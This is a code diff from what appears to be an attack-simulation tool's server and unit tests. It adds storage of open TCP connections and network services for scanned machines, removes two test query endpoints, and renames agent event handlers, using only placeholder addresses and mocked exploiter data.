@ -85,6 +95,14 @@ class ScanEventHandler:
            src_machine.id, target_machine.id, CommunicationType.SCANNED
        )

-    def _get_source_machine(self, event: ScanEvent) -> Machine:
-        agent = self._agent_repository.get_agent_by_id(event.source)
-        return self._machine_repository.get_machine_by_id(agent.machine_id)
+    def _update_tcp_connections(self, src_node: Node, target_machine: Machine, event: TCPScanEvent):
+        tcp_connections = set()
+        open_ports = (port for port, status in event.ports.items() if status == PortStatus.OPEN)
+        for open_port in open_ports:
+            socket_address = SocketAddress(ip=event.target, port=open_port)
+            tcp_connections.add(socket_address)
+
+        if tcp_connections:
+            self._node_repository.upsert_tcp_connections(
+                src_node.machine_id, {target_machine.id: tuple(tcp_connections)}
+            )
--- a/monkey/monkey_island/cc/app.py
+++ b/monkey/monkey_island/cc/app.py
@ -31,8 +31,6 @@ from monkey_island.cc.resources import (
 from monkey_island.cc.resources.AbstractResource import AbstractResource
 from monkey_island.cc.resources.attack.attack_report import AttackReport
 from monkey_island.cc.resources.auth import Authenticate, Register, RegistrationStatus, init_jwt
-from monkey_island.cc.resources.blackbox.log_blackbox_endpoint import LogBlackboxEndpoint
-from monkey_island.cc.resources.blackbox.monkey_blackbox_endpoint import MonkeyBlackboxEndpoint
 from monkey_island.cc.resources.blackbox.telemetry_blackbox_endpoint import (
    TelemetryBlackboxEndpoint,
 )
@ -207,8 +205,6 @@ def init_restful_endpoints(api: FlaskDIWrapper):
    # API Spec: Fix all the following endpoints, see comments in the resource classes
    # Note: Preferably, the API will provide a rich feature set and allow access to all of the
    #       necessary data. This would make these endpoints obsolete.
-    api.add_resource(MonkeyBlackboxEndpoint)
-    api.add_resource(LogBlackboxEndpoint)
    api.add_resource(TelemetryBlackboxEndpoint)


--- a/monkey/monkey_island/cc/models/machine.py
+++ b/monkey/monkey_island/cc/models/machine.py
@ -1,19 +1,45 @@
+import json
 from ipaddress import IPv4Interface
-from typing import Optional, Sequence
+from typing import Any, Dict, Mapping, Optional, Sequence

 from pydantic import Field, validator

 from common import OperatingSystem
-from common.base_models import MutableInfectionMonkeyBaseModel
+from common.base_models import MutableInfectionMonkeyBaseModel, MutableInfectionMonkeyModelConfig
 from common.transforms import make_immutable_sequence
-from common.types import HardwareID
+from common.types import HardwareID, NetworkService, SocketAddress

 from . import MachineID


+def _serialize_network_services(machine_dict: Dict, *, default):
+    machine_dict["network_services"] = {
+        str(addr): val for addr, val in machine_dict["network_services"].items()
+    }
+    return json.dumps(machine_dict, default=default)
+
+
 class Machine(MutableInfectionMonkeyBaseModel):
    """Represents machines, VMs, or other network nodes discovered by Infection Monkey"""

+    class Config(MutableInfectionMonkeyModelConfig):
+        json_dumps = _serialize_network_services
+
+    @validator("network_services", pre=True)
+    def _socketaddress_from_string(cls, v: Any) -> Any:
+        if not isinstance(v, Mapping):
+            # Let pydantic's type validation handle this
+            return v
+
+        new_network_services = {}
+        for addr, service in v.items():
+            if isinstance(addr, SocketAddress):
+                new_network_services[addr] = service
+            else:
+                new_network_services[SocketAddress.from_string(addr)] = service
+
+        return new_network_services
+
    id: MachineID = Field(..., allow_mutation=False)
    """Uniquely identifies the machine within the island"""

@ -35,6 +61,9 @@ class Machine(MutableInfectionMonkeyBaseModel):
    hostname: str = ""
    """The hostname of the machine"""

+    network_services: Mapping[SocketAddress, NetworkService] = Field(default_factory=dict)
+    """All network services found running on the machine"""
+
    _make_immutable_sequence = validator("network_interfaces", pre=True, allow_reuse=True)(
        make_immutable_sequence
    )
--- a/monkey/monkey_island/cc/models/node.py
+++ b/monkey/monkey_island/cc/models/node.py
@ -1,13 +1,15 @@
-from typing import FrozenSet, Mapping
+from typing import Dict, FrozenSet, Mapping, Tuple

 from pydantic import Field
 from typing_extensions import TypeAlias

 from common.base_models import MutableInfectionMonkeyBaseModel
+from common.types import SocketAddress

 from . import CommunicationType, MachineID

 NodeConnections: TypeAlias = Mapping[MachineID, FrozenSet[CommunicationType]]
+TCPConnections: TypeAlias = Dict[MachineID, Tuple[SocketAddress, ...]]


 class Node(MutableInfectionMonkeyBaseModel):
@ -24,3 +26,6 @@ class Node(MutableInfectionMonkeyBaseModel):

    connections: NodeConnections
    """All outbound connections from this node to other machines"""
+
+    tcp_connections: TCPConnections = {}
+    """All successfull outbound TCP connections"""
--- a/monkey/monkey_island/cc/repository/i_node_repository.py
+++ b/monkey/monkey_island/cc/repository/i_node_repository.py
@ -2,6 +2,7 @@ from abc import ABC, abstractmethod
 from typing import Sequence

 from monkey_island.cc.models import CommunicationType, MachineID, Node
+from monkey_island.cc.models.node import TCPConnections


 class INodeRepository(ABC):
@ -25,6 +26,15 @@ class INodeRepository(ABC):
        :raises StorageError: If an error occurs while attempting to upsert the Node
        """

+    @abstractmethod
+    def upsert_tcp_connections(self, machine_id: MachineID, tcp_connections: TCPConnections):
+        """
+        Add TCP connections to Node
+        :param machine_id: Machine ID of the Node that made the connections
+        :param tcp_connections: TCP connections made by node
+        :raises StorageError: If an error occurs while attempting to add connections
+        """
+
    @abstractmethod
    def get_nodes(self) -> Sequence[Node]:
        """
@ -34,6 +44,15 @@ class INodeRepository(ABC):
        :raises RetrievalError: If an error occurs while attempting to retrieve the nodes
        """

+    @abstractmethod
+    def get_node_by_machine_id(self, machine_id: MachineID) -> Node:
+        """
+        Fetches network Node from the database based on Machine id
+        :param machine_id: ID of a Machine that Node represents
+        :return: network Node that represents the Machine
+        :raises UnknownRecordError: If the Node does not exist
+        """
+
    @abstractmethod
    def reset(self):
        """
--- a/monkey/monkey_island/cc/repository/mongo_node_repository.py
+++ b/monkey/monkey_island/cc/repository/mongo_node_repository.py
@ -5,7 +5,8 @@ from pymongo import MongoClient

 from monkey_island.cc.models import CommunicationType, MachineID, Node

-from . import INodeRepository, RemovalError, RetrievalError, StorageError
+from ..models.node import TCPConnections
+from . import INodeRepository, RemovalError, RetrievalError, StorageError, UnknownRecordError
 from .consts import MONGO_OBJECT_ID_KEY

 UPSERT_ERROR_MESSAGE = "An error occurred while attempting to upsert a node"
@ -20,19 +21,14 @@ class MongoNodeRepository(INodeRepository):
        self, src: MachineID, dst: MachineID, communication_type: CommunicationType
    ):
        try:
-            node_dict = self._nodes_collection.find_one(
-                {SRC_FIELD_NAME: src}, {MONGO_OBJECT_ID_KEY: False}
-            )
-        except Exception as err:
-            raise StorageError(f"{UPSERT_ERROR_MESSAGE}: {err}")
-
-        if node_dict is None:
-            updated_node = Node(machine_id=src, connections={dst: frozenset((communication_type,))})
-        else:
-            node = Node(**node_dict)
+            node = self.get_node_by_machine_id(src)
            updated_node = MongoNodeRepository._add_connection_to_node(
                node, dst, communication_type
            )
+        except UnknownRecordError:
+            updated_node = Node(machine_id=src, connections={dst: frozenset((communication_type,))})
+        except Exception as err:
+            raise StorageError(f"{UPSERT_ERROR_MESSAGE}: {err}")

        self._upsert_node(updated_node)

@ -50,6 +46,19 @@ class MongoNodeRepository(INodeRepository):

        return new_node

+    def upsert_tcp_connections(self, machine_id: MachineID, tcp_connections: TCPConnections):
+        try:
+            node = self.get_node_by_machine_id(machine_id)
+        except UnknownRecordError:
+            node = Node(machine_id=machine_id, connections={})
+
+        for target, connections in tcp_connections.items():
+            if target in node.tcp_connections:
+                node.tcp_connections[target] = tuple({*node.tcp_connections[target], *connections})
+            else:
+                node.tcp_connections[target] = connections
+        self._upsert_node(node)
+
    def _upsert_node(self, node: Node):
        try:
            result = self._nodes_collection.replace_one(
@ -58,18 +67,20 @@ class MongoNodeRepository(INodeRepository):
        except Exception as err:
            raise StorageError(f"{UPSERT_ERROR_MESSAGE}: {err}")

-        if result.matched_count != 0 and result.modified_count != 1:
-            raise StorageError(
-                f'Error updating node with source ID "{node.machine_id}": Expected to update 1 '
-                f"node, but {result.modified_count} were updated"
-            )
-
        if result.matched_count == 0 and result.upserted_id is None:
            raise StorageError(
                f'Error inserting node with source ID "{node.machine_id}": Expected to insert 1 '
                f"node, but no nodes were inserted"
            )

+    def get_node_by_machine_id(self, machine_id: MachineID) -> Node:
+        node_dict = self._nodes_collection.find_one(
+            {SRC_FIELD_NAME: machine_id}, {MONGO_OBJECT_ID_KEY: False}
+        )
+        if not node_dict:
+            raise UnknownRecordError(f"Node with machine ID {machine_id}")
+        return Node(**node_dict)
+
    def get_nodes(self) -> Sequence[Node]:
        try:
            cursor = self._nodes_collection.find({}, {MONGO_OBJECT_ID_KEY: False})
--- a/monkey/monkey_island/cc/resources/blackbox/log_blackbox_endpoint.py
+++ b/monkey/monkey_island/cc/resources/blackbox/log_blackbox_endpoint.py
@ -1,20 +0,0 @@
-from bson import json_util
-from flask import request
-
-from monkey_island.cc.database import database, mongo
-from monkey_island.cc.resources.AbstractResource import AbstractResource
-from monkey_island.cc.resources.request_authentication import jwt_required
-
-
-class LogBlackboxEndpoint(AbstractResource):
-    # API Spec: Rename to noun, BlackboxTestsLogs or something
-    urls = ["/api/test/log"]
-
-    @jwt_required
-    def get(self):
-        find_query = json_util.loads(request.args.get("find_query"))
-        log = mongo.db.log.find_one(find_query)
-        if not log:
-            return {"results": None}
-        log_file = database.gridfs.get(log["file_id"])
-        return {"results": log_file.read().decode()}
--- a/monkey/monkey_island/cc/resources/blackbox/monkey_blackbox_endpoint.py
+++ b/monkey/monkey_island/cc/resources/blackbox/monkey_blackbox_endpoint.py
@ -1,16 +0,0 @@
-from bson import json_util
-from flask import request
-
-from monkey_island.cc.database import mongo
-from monkey_island.cc.resources.AbstractResource import AbstractResource
-from monkey_island.cc.resources.request_authentication import jwt_required
-
-
-class MonkeyBlackboxEndpoint(AbstractResource):
-    # API Spec: Rename to noun, BlackboxTestsMonkeys or something
-    urls = ["/api/test/monkey"]
-
-    @jwt_required
-    def get(self, **kw):
-        find_query = json_util.loads(request.args.get("find_query"))
-        return {"results": list(mongo.db.monkey.find(find_query))}
--- a/monkey/monkey_island/cc/ui/package-lock.json
+++ b/monkey/monkey_island/cc/ui/package-lock.json
--- a/monkey/monkey_island/cc/ui/package.json
+++ b/monkey/monkey_island/cc/ui/package.json
@ -77,7 +77,7 @@
    "classnames": "^2.3.1",
    "core-js": "^3.18.2",
    "crypto-js": "^4.1.1",
-    "d3": "^5.14.1",
+    "d3": "^7.6.1",
    "downloadjs": "^1.4.7",
    "fetch": "^1.1.0",
    "file-saver": "^2.0.5",
--- a/monkey/tests/unit_tests/infection_monkey/agent_event_handlers/init.py
+++ b/monkey/tests/unit_tests/infection_monkey/agent_event_handlers/init.py
--- a/monkey/tests/unit_tests/infection_monkey/agent_event_handlers/test_notify_relay_on_propagation.py
+++ b/monkey/tests/unit_tests/infection_monkey/agent_event_handlers/test_notify_relay_on_propagation.py
@ -0,0 +1,54 @@
+from ipaddress import IPv4Address
+from unittest.mock import MagicMock
+from uuid import UUID
+
+import pytest
+
+from common.agent_events import PropagationEvent
+from infection_monkey.agent_event_handlers import notify_relay_on_propagation
+from infection_monkey.network.relay import TCPRelay
+
+TARGET_ADDRESS = IPv4Address("192.168.1.10")
+
+SUCCESSFUL_PROPAGATION_EVENT = PropagationEvent(
+    source=UUID("f811ad00-5a68-4437-bd51-7b5cc1768ad5"),
+    target=TARGET_ADDRESS,
+    tags=frozenset({"test"}),
+    success=True,
+    exploiter_name="test_exploiter",
+)
+
+FAILED_PROPAGATION_EVENT = PropagationEvent(
+    source=UUID("f811ad00-5a68-4437-bd51-7b5cc1768ad5"),
+    target=TARGET_ADDRESS,
+    tags=frozenset({"test"}),
+    success=False,
+    exploiter_name="test_exploiter",
+    error_message="everything is broken",
+)
+
+
+@pytest.fixture
+def mock_tcp_relay():
+    return MagicMock(spec=TCPRelay)
+
+
+def test_relay_notified_on_successful_propation(mock_tcp_relay):
+    handler = notify_relay_on_propagation(mock_tcp_relay)
+    handler(SUCCESSFUL_PROPAGATION_EVENT)
+
+    mock_tcp_relay.add_potential_user.assert_called_once_with(TARGET_ADDRESS)
+
+
+def test_relay_not_notified_on_successful_propation(mock_tcp_relay):
+    handler = notify_relay_on_propagation(mock_tcp_relay)
+    handler(FAILED_PROPAGATION_EVENT)
+
+    mock_tcp_relay.add_potential_user.assert_not_called()
+
+
+def test_handler_doesnt_raise_if_relay_is_none():
+    handler = notify_relay_on_propagation(None)
+
+    # Raises AttributeError on failure
+    handler(SUCCESSFUL_PROPAGATION_EVENT)
--- a/monkey/tests/unit_tests/infection_monkey/credential_store/test_add_credentials_from_event.py
+++ b/monkey/tests/unit_tests/infection_monkey/credential_store/test_add_credentials_from_event.py
@ -3,10 +3,10 @@ from uuid import UUID

 from common.agent_events import CredentialsStolenEvent
 from common.credentials import Credentials, Password, Username
-from infection_monkey.credential_repository import (
-    IPropagationCredentialsRepository,
-    add_credentials_from_event_to_propagation_credentials_repository,
+from infection_monkey.agent_event_handlers import (
+    add_stolen_credentials_to_propagation_credentials_repository,
 )
+from infection_monkey.credential_repository import IPropagationCredentialsRepository

 credentials = [
    Credentials(
@ -25,7 +25,7 @@ credentials_stolen_event = CredentialsStolenEvent(

 def test_add_credentials_from_event_to_propagation_credentials_repository():
    mock_propagation_credentials_repository = MagicMock(spec=IPropagationCredentialsRepository)
-    fn = add_credentials_from_event_to_propagation_credentials_repository(
+    fn = add_stolen_credentials_to_propagation_credentials_repository(
        mock_propagation_credentials_repository
    )

--- a/monkey/tests/unit_tests/infection_monkey/exploit/test_powershell.py
+++ b/monkey/tests/unit_tests/infection_monkey/exploit/test_powershell.py
@ -16,6 +16,7 @@ LM_HASH_LIST = ["bogo_lm_1"]
 NT_HASH_LIST = ["bogo_nt_1", "bogo_nt_2"]

 bogus_servers = ["1.1.1.1:5000", "2.2.2.2:5007"]
+VICTIM_IP = "10.10.10.1"


 mock_agent_binary_repository = MagicMock()
@ -23,7 +24,25 @@ mock_agent_binary_repository.get_agent_binary.return_value = BytesIO(b"BINARY_EX


@pytest.fixture
-def powershell_arguments(http_and_https_both_enabled_host):
+def host_with_ip_address(http_and_https_both_enabled_host):
+    http_and_https_both_enabled_host.ip_addr = VICTIM_IP
+    return http_and_https_both_enabled_host
+
+
+@pytest.fixture
+def http_host_with_ip_address(http_only_host):
+    http_only_host.ip_addr = VICTIM_IP
+    return http_only_host
+
+
+@pytest.fixture
+def https_host_with_ip_address(https_only_host):
+    https_only_host.ip_addr = VICTIM_IP
+    return https_only_host
+
+
+@pytest.fixture
+def powershell_arguments(host_with_ip_address):
    options = {
        "credentials": {
            "exploit_user_list": USER_LIST,
@ -33,12 +52,12 @@ def powershell_arguments(http_and_https_both_enabled_host):
        },
    }
    arguments = {
-        "host": http_and_https_both_enabled_host,
+        "host": host_with_ip_address,
        "servers": bogus_servers,
        "options": options,
        "current_depth": 2,
        "telemetry_messenger": MagicMock(),
-        "event_queue": MagicMock(),
+        "agent_event_queue": MagicMock(),
        "agent_binary_repository": mock_agent_binary_repository,
        "interrupt": threading.Event(),
    }
@ -63,8 +82,10 @@ def test_powershell_disabled(powershell_exploiter, powershell_arguments, powersh
    assert "disabled" in exploit_result.error_message


-def test_powershell_http(monkeypatch, powershell_exploiter, powershell_arguments, http_only_host):
-    powershell_arguments["host"] = http_only_host
+def test_powershell_http(
+    monkeypatch, powershell_exploiter, powershell_arguments, http_host_with_ip_address
+):
+    powershell_arguments["host"] = http_host_with_ip_address

    mock_powershell_client = MagicMock()
    monkeypatch.setattr(
@ -77,7 +98,7 @@ def test_powershell_http(monkeypatch, powershell_exploiter, powershell_arguments
        assert not call_args[0][2].ssl


-def test_powershell_https(monkeypatch, powershell_exploiter, powershell_arguments, https_only_host):
+def test_powershell_https(monkeypatch, powershell_exploiter, powershell_arguments):
    mock_powershell_client = MagicMock()
    mock_powershell_client.connect = MagicMock(side_effect=Exception("Failed login"))
    mock_powershell_client_constructor = MagicMock(return_value=mock_powershell_client)
@ -191,11 +212,11 @@ def test_build_monkey_execution_command():


 def test_skip_http_only_logins(
-    monkeypatch, powershell_exploiter, powershell_arguments, https_only_host
+    monkeypatch, powershell_exploiter, powershell_arguments, https_host_with_ip_address
 ):
    # Only HTTPS is enabled on the destination, so we should never try to connect with "" empty
    # password, since connection with empty password requires SSL == False.
-    powershell_arguments["host"] = https_only_host
+    powershell_arguments["host"] = https_host_with_ip_address

    mock_powershell_client = MagicMock()
    mock_powershell_client.connect = MagicMock(side_effect=Exception("Failed login"))
--- a/monkey/tests/unit_tests/infection_monkey/telemetry/messengers/test_exploit_intercepting_telemetry_messenger.py
+++ b/monkey/tests/unit_tests/infection_monkey/telemetry/messengers/test_exploit_intercepting_telemetry_messenger.py
@ -1,62 +0,0 @@
-from unittest.mock import MagicMock
-
-from infection_monkey.i_puppet.i_puppet import ExploiterResultData
-from infection_monkey.model.host import VictimHost
-from infection_monkey.telemetry.exploit_telem import ExploitTelem
-from infection_monkey.telemetry.messengers.exploit_intercepting_telemetry_messenger import (
-    ExploitInterceptingTelemetryMessenger,
-)
-
-
-class MockExploitTelem(ExploitTelem):
-    def __init__(self, propagation_success):
-        erd = ExploiterResultData()
-        erd.propagation_success = propagation_success
-        super().__init__("TestExploiter", VictimHost("127.0.0.1"), erd)
-
-    def get_data(self):
-        return {}
-
-
-def test_generic_telemetry(TestTelem):
-    mock_telemetry_messenger = MagicMock()
-    mock_relay = MagicMock()
-
-    telemetry_messenger = ExploitInterceptingTelemetryMessenger(
-        mock_telemetry_messenger, mock_relay
-    )
-
-    telemetry_messenger.send_telemetry(TestTelem())
-
-    assert mock_telemetry_messenger.send_telemetry.called
-    assert not mock_relay.add_potential_user.called
-
-
-def test_propagation_successful_exploit_telemetry():
-    mock_telemetry_messenger = MagicMock()
-    mock_relay = MagicMock()
-    mock_exploit_telem = MockExploitTelem(True)
-
-    telemetry_messenger = ExploitInterceptingTelemetryMessenger(
-        mock_telemetry_messenger, mock_relay
-    )
-
-    telemetry_messenger.send_telemetry(mock_exploit_telem)
-
-    assert mock_telemetry_messenger.send_telemetry.called
-    assert mock_relay.add_potential_user.called
-
-
-def test_propagation_failed_exploit_telemetry():
-    mock_telemetry_messenger = MagicMock()
-    mock_relay = MagicMock()
-    mock_exploit_telem = MockExploitTelem(False)
-
-    telemetry_messenger = ExploitInterceptingTelemetryMessenger(
-        mock_telemetry_messenger, mock_relay
-    )
-
-    telemetry_messenger.send_telemetry(mock_exploit_telem)
-
-    assert mock_telemetry_messenger.send_telemetry.called
-    assert not mock_relay.add_potential_user.called
--- a/monkey/tests/unit_tests/infection_monkey/test_agent_event_forwarder.py
+++ b/monkey/tests/unit_tests/infection_monkey/test_agent_event_forwarder.py
@ -3,7 +3,7 @@ from unittest.mock import MagicMock

 import pytest

-from infection_monkey.agent_event_forwarder import BatchingAgentEventForwarder
+from infection_monkey.agent_event_handlers.agent_event_forwarder import BatchingAgentEventForwarder
 from infection_monkey.island_api_client import IIslandAPIClient

 SERVER = "1.1.1.1:9999"
--- a/monkey/tests/unit_tests/monkey_island/cc/agent_event_handlers/test_scan_event_handler.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/agent_event_handlers/test_scan_event_handler.py
@ -1,3 +1,4 @@
+from copy import deepcopy
 from ipaddress import IPv4Address, IPv4Interface
 from itertools import count
 from unittest.mock import MagicMock
@ -9,7 +10,7 @@ from common import OperatingSystem
 from common.agent_events import PingScanEvent, TCPScanEvent
 from common.types import PortStatus, SocketAddress
 from monkey_island.cc.agent_event_handlers import ScanEventHandler
-from monkey_island.cc.models import Agent, CommunicationType, Machine
+from monkey_island.cc.models import Agent, CommunicationType, Machine, Node
 from monkey_island.cc.repository import (
    IAgentRepository,
    IMachineRepository,
@ -29,43 +30,60 @@ SOURCE_MACHINE = Machine(
    hardware_id=5,
    network_interfaces=[IPv4Interface("10.10.10.99/24")],
 )
+
+TARGET_MACHINE_ID = 33
+TARGET_MACHINE_IP = "10.10.10.1"
 TARGET_MACHINE = Machine(
-    id=33,
+    id=TARGET_MACHINE_ID,
    hardware_id=9,
-    network_interfaces=[IPv4Interface("10.10.10.1/24")],
+    network_interfaces=[IPv4Interface(f"{TARGET_MACHINE_IP}/24")],
+)
+
+SOURCE_NODE = Node(
+    machine_id=SOURCE_MACHINE.id,
+    connections=[],
+    tcp_connections={
+        44: (SocketAddress(ip="1.1.1.1", port=40), SocketAddress(ip="2.2.2.2", port=50))
+    },
 )

 PING_SCAN_EVENT = PingScanEvent(
    source=AGENT_ID,
-    target=IPv4Address("10.10.10.1"),
+    target=IPv4Address(TARGET_MACHINE_IP),
    response_received=True,
    os=OperatingSystem.LINUX,
 )

 PING_SCAN_EVENT_NO_RESPONSE = PingScanEvent(
    source=AGENT_ID,
-    target=IPv4Address("10.10.10.1"),
+    target=IPv4Address(TARGET_MACHINE_IP),
    response_received=False,
    os=OperatingSystem.LINUX,
 )

 PING_SCAN_EVENT_NO_OS = PingScanEvent(
    source=AGENT_ID,
-    target=IPv4Address("10.10.10.1"),
+    target=IPv4Address(TARGET_MACHINE_IP),
    response_received=True,
    os=None,
 )

-
 TCP_SCAN_EVENT = TCPScanEvent(
    source=AGENT_ID,
-    target=IPv4Address("10.10.10.1"),
-    ports={22: PortStatus.OPEN, 8080: PortStatus.CLOSED},
+    target=IPv4Address(TARGET_MACHINE_IP),
+    ports={22: PortStatus.OPEN, 80: PortStatus.OPEN, 8080: PortStatus.CLOSED},
 )

+TCP_CONNECTIONS = {
+    TARGET_MACHINE_ID: (
+        SocketAddress(ip=TARGET_MACHINE_IP, port=22),
+        SocketAddress(ip=TARGET_MACHINE_IP, port=80),
+    )
+}
+
 TCP_SCAN_EVENT_CLOSED = TCPScanEvent(
    source=AGENT_ID,
-    target=IPv4Address("10.10.10.1"),
+    target=IPv4Address(TARGET_MACHINE_IP),
    ports={145: PortStatus.CLOSED, 8080: PortStatus.CLOSED},
 )

@ -91,6 +109,8 @@ def machine_repository() -> IMachineRepository:
@pytest.fixture
 def node_repository() -> INodeRepository:
    node_repository = MagicMock(spec=INodeRepository)
+    node_repository.get_nodes.return_value = [deepcopy(SOURCE_NODE)]
+    node_repository.upsert_node = MagicMock()
    node_repository.upsert_communication = MagicMock()
    return node_repository

@ -103,7 +123,7 @@ def scan_event_handler(agent_repository, machine_repository, node_repository):
 MACHINES_BY_ID = {MACHINE_ID: SOURCE_MACHINE, TARGET_MACHINE.id: TARGET_MACHINE}
 MACHINES_BY_IP = {
    IPv4Address("10.10.10.99"): [SOURCE_MACHINE],
-    IPv4Address("10.10.10.1"): [TARGET_MACHINE],
+    IPv4Address(TARGET_MACHINE_IP): [TARGET_MACHINE],
 }


@ -186,6 +206,44 @@ def test_tcp_scan_event_target_machine_not_exists(
    machine_repository.upsert_machine.assert_called_with(expected_machine)


+def test_handle_tcp_scan_event__no_open_ports(
+    scan_event_handler, machine_repository, node_repository
+):
+    event = TCP_SCAN_EVENT_CLOSED
+    scan_event_handler._update_nodes = MagicMock()
+    scan_event_handler.handle_tcp_scan_event(event)
+
+    assert not node_repository.upsert_tcp_connections.called
+
+
+def test_handle_tcp_scan_event__ports_found(
+    scan_event_handler, machine_repository, node_repository
+):
+    event = TCP_SCAN_EVENT
+    scan_event_handler._update_nodes = MagicMock()
+    node_repository.get_node_by_machine_id.return_value = SOURCE_NODE
+    scan_event_handler.handle_tcp_scan_event(event)
+
+    call_args = node_repository.upsert_tcp_connections.call_args[0]
+    assert call_args[0] == MACHINE_ID
+    assert TARGET_MACHINE_ID in call_args[1]
+    open_socket_addresses = call_args[1][TARGET_MACHINE_ID]
+    assert set(open_socket_addresses) == set(TCP_CONNECTIONS[TARGET_MACHINE_ID])
+    assert len(open_socket_addresses) == len(TCP_CONNECTIONS[TARGET_MACHINE_ID])
+
+
+def test_handle_tcp_scan_event__no_source(
+    caplog, scan_event_handler, machine_repository, node_repository
+):
+    event = TCP_SCAN_EVENT
+    node_repository.get_node_by_machine_id = MagicMock(side_effect=UnknownRecordError("no source"))
+    scan_event_handler._update_nodes = MagicMock()
+
+    scan_event_handler.handle_tcp_scan_event(event)
+    assert "ERROR" in caplog.text
+    assert "no source" in caplog.text
+
+
@pytest.mark.parametrize(
    "event,handler",
    [(PING_SCAN_EVENT, HANDLE_PING_SCAN_METHOD), (TCP_SCAN_EVENT, HANDLE_TCP_SCAN_METHOD)],
--- a/monkey/tests/unit_tests/monkey_island/cc/models/test_machine.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/models/test_machine.py
@ -6,8 +6,12 @@ from typing import MutableSequence
 import pytest

 from common import OperatingSystem
+from common.types import NetworkService, SocketAddress
 from monkey_island.cc.models import Machine

+SOCKET_ADDR_1 = "192.168.1.10:5000"
+SOCKET_ADDR_2 = "192.168.1.10:8080"
+
 MACHINE_OBJECT_DICT = MappingProxyType(
    {
        "id": 1,
@ -17,6 +21,10 @@ MACHINE_OBJECT_DICT = MappingProxyType(
        "operating_system": OperatingSystem.WINDOWS,
        "operating_system_version": "eXtra Problems",
        "hostname": "my.host",
+        "network_services": {
+            SocketAddress.from_string(SOCKET_ADDR_1): NetworkService.UNKNOWN,
+            SocketAddress.from_string(SOCKET_ADDR_2): NetworkService.UNKNOWN,
+        },
    }
 )

@ -26,9 +34,13 @@ MACHINE_SIMPLE_DICT = MappingProxyType(
        "hardware_id": uuid.getnode(),
        "island": True,
        "network_interfaces": ["10.0.0.1/24", "192.168.5.32/16"],
-        "operating_system": "windows",
+        "operating_system": OperatingSystem.WINDOWS.value,
        "operating_system_version": "eXtra Problems",
        "hostname": "my.host",
+        "network_services": {
+            SOCKET_ADDR_1: NetworkService.UNKNOWN.value,
+            SOCKET_ADDR_2: NetworkService.UNKNOWN.value,
+        },
    }
 )

@ -60,6 +72,11 @@ def test_to_dict():
        ("operating_system", "bsd"),
        ("operating_system_version", {}),
        ("hostname", []),
+        ("network_services", 42),
+        ("network_services", [SOCKET_ADDR_1]),
+        ("network_services", None),
+        ("network_services", {SOCKET_ADDR_1: "Hello"}),
+        ("network_services", {SocketAddress.from_string(SOCKET_ADDR_1): "Hello"}),
    ],
 )
 def test_construct_invalid_field__type_error(key, value):
@ -77,6 +94,7 @@ def test_construct_invalid_field__type_error(key, value):
        ("hardware_id", 0),
        ("network_interfaces", [1, "stuff", 3]),
        ("network_interfaces", ["10.0.0.1/16", 2, []]),
+        ("network_services", {"192.168.": NetworkService.UNKNOWN.value}),
    ],
 )
 def test_construct_invalid_field__value_error(key, value):
@ -230,3 +248,19 @@ def test_hostname_default_value():
    m = Machine(**missing_hostname_dict)

    assert m.hostname == ""
+
+
+def test_set_network_services_validates():
+    m = Machine(**MACHINE_OBJECT_DICT)
+
+    with pytest.raises(ValueError):
+        m.network_services = {"not-an-ip": NetworkService.UNKNOWN.value}
+
+
+def test_set_network_services_default_value():
+    missing_network_services = MACHINE_OBJECT_DICT.copy()
+    del missing_network_services["network_services"]
+
+    m = Machine(**missing_network_services)
+
+    assert m.network_services == {}
--- a/monkey/tests/unit_tests/monkey_island/cc/models/test_node.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/models/test_node.py
@ -2,6 +2,7 @@ from typing import MutableSequence

 import pytest

+from common.types import SocketAddress
 from monkey_island.cc.models import CommunicationType, Node


@ -11,13 +12,21 @@ def test_constructor():
        6: frozenset((CommunicationType.SCANNED,)),
        7: frozenset((CommunicationType.SCANNED, CommunicationType.EXPLOITED)),
    }
+    tcp_connections = {
+        6: tuple(
+            (SocketAddress(ip="192.168.1.1", port=80), SocketAddress(ip="192.168.1.1", port=443))
+        ),
+        7: tuple((SocketAddress(ip="192.168.1.2", port=22),)),
+    }
    n = Node(
-        machine_id=1,
+        machine_id=machine_id,
        connections=connections,
+        tcp_connections=tcp_connections,
    )

    assert n.machine_id == machine_id
    assert n.connections == connections
+    assert n.tcp_connections == tcp_connections


 def test_serialization():
@ -27,9 +36,12 @@ def test_serialization():
            "6": [CommunicationType.CC.value, CommunicationType.SCANNED.value],
            "7": [CommunicationType.EXPLOITED.value, CommunicationType.CC.value],
        },
+        "tcp_connections": {
+            "6": [{"ip": "192.168.1.1", "port": 80}, {"ip": "192.168.1.1", "port": 443}],
+            "7": [{"ip": "192.168.1.2", "port": 22}],
+        },
    }
-    # "6": frozenset((CommunicationType.CC, CommunicationType.SCANNED)),
-    # "7": frozenset((CommunicationType.EXPLOITED, CommunicationType.CC)),
+
    n = Node(**node_dict)

    serialized_node = n.dict(simplify=True)
@ -44,6 +56,8 @@ def test_serialization():
    for key, value in serialized_node["connections"].items():
        assert set(value) == set(node_dict["connections"][key])

+    assert serialized_node["tcp_connections"] == node_dict["tcp_connections"]
+

 def test_machine_id_immutable():
    n = Node(machine_id=1, connections={})
--- a/monkey/tests/unit_tests/monkey_island/cc/repository/test_mongo_node_repository.py
+++ b/monkey/tests/unit_tests/monkey_island/cc/repository/test_mongo_node_repository.py
@ -3,6 +3,7 @@ from unittest.mock import MagicMock
 import mongomock
 import pytest

+from common.types import SocketAddress
 from monkey_island.cc.models import CommunicationType, Node
 from monkey_island.cc.repository import (
    INodeRepository,
@ -10,8 +11,17 @@ from monkey_island.cc.repository import (
    RemovalError,
    RetrievalError,
    StorageError,
+    UnknownRecordError,
 )

+TARGET_MACHINE_IP = "2.2.2.2"
+
+TCP_CONNECTION_PORT_22 = {3: (SocketAddress(ip=TARGET_MACHINE_IP, port=22),)}
+TCP_CONNECTION_PORT_80 = {3: (SocketAddress(ip=TARGET_MACHINE_IP, port=80),)}
+ALL_TCP_CONNECTIONS = {
+    3: (SocketAddress(ip=TARGET_MACHINE_IP, port=22), SocketAddress(ip=TARGET_MACHINE_IP, port=80))
+}
+
 NODES = (
    Node(
        machine_id=1,
@ -23,6 +33,7 @@ NODES = (
    Node(
        machine_id=2,
        connections={1: frozenset((CommunicationType.CC,))},
+        tcp_connections=TCP_CONNECTION_PORT_22,
    ),
    Node(
        machine_id=3,
@ -32,10 +43,7 @@ NODES = (
